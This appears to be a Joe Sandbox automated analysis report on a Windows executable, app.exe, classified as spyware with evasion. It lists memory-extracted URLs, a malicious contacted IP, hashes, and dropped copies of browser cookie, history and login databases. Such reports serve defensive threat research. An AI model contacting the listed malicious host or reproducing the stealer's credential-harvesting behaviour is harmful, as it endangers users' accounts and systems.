                                                        http://144.208.127.230/Yapp.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292Kapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://secure.eicar.org/eicar.com.txtDapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bTapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abrapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://lh5.googleusercontent.com/p/AF1QipPFr704HJkdqZ5xefxGs53Btx8SeAbaCnWxa6-y=w92-h92-n-k-noapp.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://144.208.127.230/Uapp.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ocsp.quovadisoffshore.com0app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://setup.office.com/?ms.officeurl=setupapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://144.208.127.230:80/app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • 0%, Virustotal, Browse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://recoveringlib.blogspot.comapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://144.208.127.230:80/-35b871f0a661app.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3101845651.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3103619876.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoapp.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drfalse
                                                                        		high
                                                                        https://aka.office.com/office/url/setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://144.208.127.230:80/Lapp.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://secure.eicar.org/eicar.comapp.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://aka.office.com/office/url/setupapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSignapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exeapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://144.208.127.230/7app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • 0%, Virustotal, Browse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.google.com/search?q=autoitapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Web Data.3.drfalse
                                                                                        		high
                                                                                        https://setup.office.com/?ms.officeurl=setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://POSTHTTP/1.1Content-Type:app.exe, 00000003.00000002.3295913444.0000000002530000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		low
                                                                                          http://144.208.127.230/e&app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://secure.eicar.org/eicar.com.txt/app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.google.com/search?q=eicarapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://secure.eicar.org/eicar.com/app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cfapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.office.com/setupapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2Vapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.google.com/favicon.icoapp.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://alldrivers4devices.netapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • 1%, Virustotal, Browse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://office.com/setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://support.google.com/chrome/?p=plugin_flashaertapp.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://ac.ecosia.org/autocomplete?q=app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.eicar.org/download-anti-malware-testfile/Downloadapp.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.office.com/setupMicrosoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://144.208.127.230:80/oapp.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2Fapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.autoitscript.com/site/autoit/downloads/AutoItapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://144.208.127.230/~app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • 0%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://144.208.127.230:80/Tapp.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • 0%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://www.quovadis.bm0app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://144.208.127.230:80/-35b871f0a661oziapp.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://144.208.127.230:80/Rapp.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQapp.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continueapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoftapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://144.208.127.230Uapp.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		low
                                                                                                                                      https://secure.eicar.org/eicar.com.txtapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.autoitscript.com/site/autoit/downloads/7app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          144.208.127.230
                                                                                                                                          		unknownUnited States
                                                                                                                                          		395092SHOCK-1UStrue
                                                                                                                                          172.67.74.152
                                                                                                                                          		api.ipify.orgUnited States
                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                          Analysis ID:1436386
                                                                                                                                          Start date and time:2024-05-05 00:21:26 +02:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 9m 57s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:light
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                          Run name:Suspected VM Detection
                                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:app.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.spyw.evad.winEXE@10/6@1/2
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 99%
                                                                                                                                          • Number of executed functions: 0
                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Stop behavior analysis, all processes terminated

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): WMIADAP.exe
                                                                                                                                          • HTTP Packets have been reduced
                                                                                                                                          • TCP Packets have been reduced to 100
                                                                                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          00:24:47API Interceptor49x Sleep call for process: app.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          No context

                                                                                                                                          Domains

                                                                                                                                          No context

                                                                                                                                          ASNs

                                                                                                                                          No context

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          No context

                                                                                                                                          Dropped Files

                                                                                                                                          No context

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1290240
                                                                                                                                          Entropy (8bit):7.441704402192102
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:CIFxe+AY3rqYsavMOQdbac5IQH97wiI3dzAr09UDZ5YUD8:1xeSNR0vbac5/d8P3diDZ6q
                                                                                                                                          MD5:75B9EF9142A78671D449C8D22AB6BE14
                                                                                                                                          SHA1:0461F1C46644ACDE8020BB59B53B1E34B65977CA
                                                                                                                                          SHA-256:E9BC44CF548A70E7285499209973FAF44B7374DECE1413DFCDC03BF25A6C599C
                                                                                                                                          SHA-512:14EF889F580C02E319B6D9D899DDBD1BD523C1D8B493EAB8B98DA6D3D276D76EFB9B5694759DF7D68BB9D002A8ACE8FC82D22121A7B4EA236D5F9CEF38CC809C
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                          • Antivirus: Virustotal, Detection: 11%, Browse
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........P(..>{..>{..>{?.c{..>{v..{..>{...{..>{f."{..>{e."{..>{F.'{..>{..?{..>{F.~{..>{F."{&.>{...{..>{..5{..>{..^{..>{F.#{.>{F.{{..>{F..{..>{Rich..>{................PE..L......P.............................]............@.......................... ..............................................$........................................................................................................................text...2........................... ....rdata...&.......0..................@..@.data........ ...@... ..............@....rsrc................`..............@..@)m&......P.......P...`.................@........................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe:Zone.Identifier

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):26
                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                          C:\Users\user\AppData\Local\Temp\Cookies

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x9, schema 4, UTF-8, version-valid-for 10
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):28672
                                                                                                                                          Entropy (8bit):1.5161495002712742
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:s3n5HGsht8kAM0hsYfxqYgXZBqIcsrl3tuY2sWsqF:c5mF5wnpx9uYSF
                                                                                                                                          MD5:16A6EDF5F48F2A7B20B3B8825384B05C
                                                                                                                                          SHA1:A59542299A41166F515B18AB8CBC3D72517ED207
                                                                                                                                          SHA-256:3E1A2BB358B396C201A6058EC8A05E25B167255EB3DAEEB1130331A298CC6F93
                                                                                                                                          SHA-512:7C4C9D69B05EA5B120C0DB6DF7D0C4487387659AF6D17C387503CA360EF8430F676B0964B6BC3C368BA4DC8D0E648B2750C26970D833788982BBF5BC04AC632D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................S`..=......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\History

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 4, database pages 35, cookie 0x1e, schema 4, UTF-8, version-valid-for 4
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):163840
                                                                                                                                          Entropy (8bit):0.44975538801868414
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:Ou1HAU+bDoYysX0uhnyZtha58VjN9DLjGQLBE3u:Ou1X+bDo3irhnyBi8Vj3XBBE3u
                                                                                                                                          MD5:89E4498D0328AFC71113CC75EBE7D770
                                                                                                                                          SHA1:120CF58C897FF1025F8B4F854A21821D948F74BC
                                                                                                                                          SHA-256:F50B271AFE0D4950FAE539E4A04C3D07849F0CE2250E73B352CDB3D981095B40
                                                                                                                                          SHA-512:7914EDF9352FBB1ABB6A0B89A4F47F09DE5672DEB6B4BE9EBEA833C8D1ED3EFD5AD16A612DF3DF65C878EB577FD0B697BC44C3E52D9BBFB82A81C1C903621989
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ .......#..................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\Login Data

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):57344
                                                                                                                                          Entropy (8bit):0.7310370201569906
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
                                                                                                                                          MD5:A802F475CA2D00B16F45FEA728F2247C
                                                                                                                                          SHA1:AF57C02DA108CFA0D7323252126CC87D7B608786
                                                                                                                                          SHA-256:156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
                                                                                                                                          SHA-512:275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\Web Data

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):122880
                                                                                                                                          Entropy (8bit):1.1414673161713362
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                                                                          MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                                                                          SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                                                                          SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                                                                          SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):7.441704402192102
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:app.exe
                                                                                                                                          File size:1'290'240 bytes
                                                                                                                                          MD5:75b9ef9142a78671d449c8d22ab6be14
                                                                                                                                          SHA1:0461f1c46644acde8020bb59b53b1e34b65977ca
                                                                                                                                          SHA256:e9bc44cf548a70e7285499209973faf44b7374dece1413dfcdc03bf25a6c599c
                                                                                                                                          SHA512:14ef889f580c02e319b6d9d899ddbd1bd523c1d8b493eab8b98da6d3d276d76efb9b5694759df7d68bb9d002a8ace8fc82d22121a7b4ea236d5f9cef38cc809c
                                                                                                                                          SSDEEP:24576:CIFxe+AY3rqYsavMOQdbac5IQH97wiI3dzAr09UDZ5YUD8:1xeSNR0vbac5/d8P3diDZ6q
                                                                                                                                          TLSH:8255CF05F3D2B8B1D15192772DC96161B6ED993048D83F0732D0EE5E1B3B9A6B40FE2A
                                                                                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........P(..>{..>{..>{?.c{..>{v..{..>{...{..>{f."{..>{e."{..>{F.'{..>{..?{..>{F.~{..>{F."{&.>{...{..>{..5{..>{..^{..>{F.#{..>{F.{{..>

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:0f4ecda7ae5d1715

                                                                                                                                          Static PE Info

                                                                                                                                          General

                                                                                                                                          Entrypoint:0x415dde
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows cui
                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:
                                                                                                                                          Time Stamp:0x500F9507 [Wed Jul 25 06:41:11 2012 UTC]
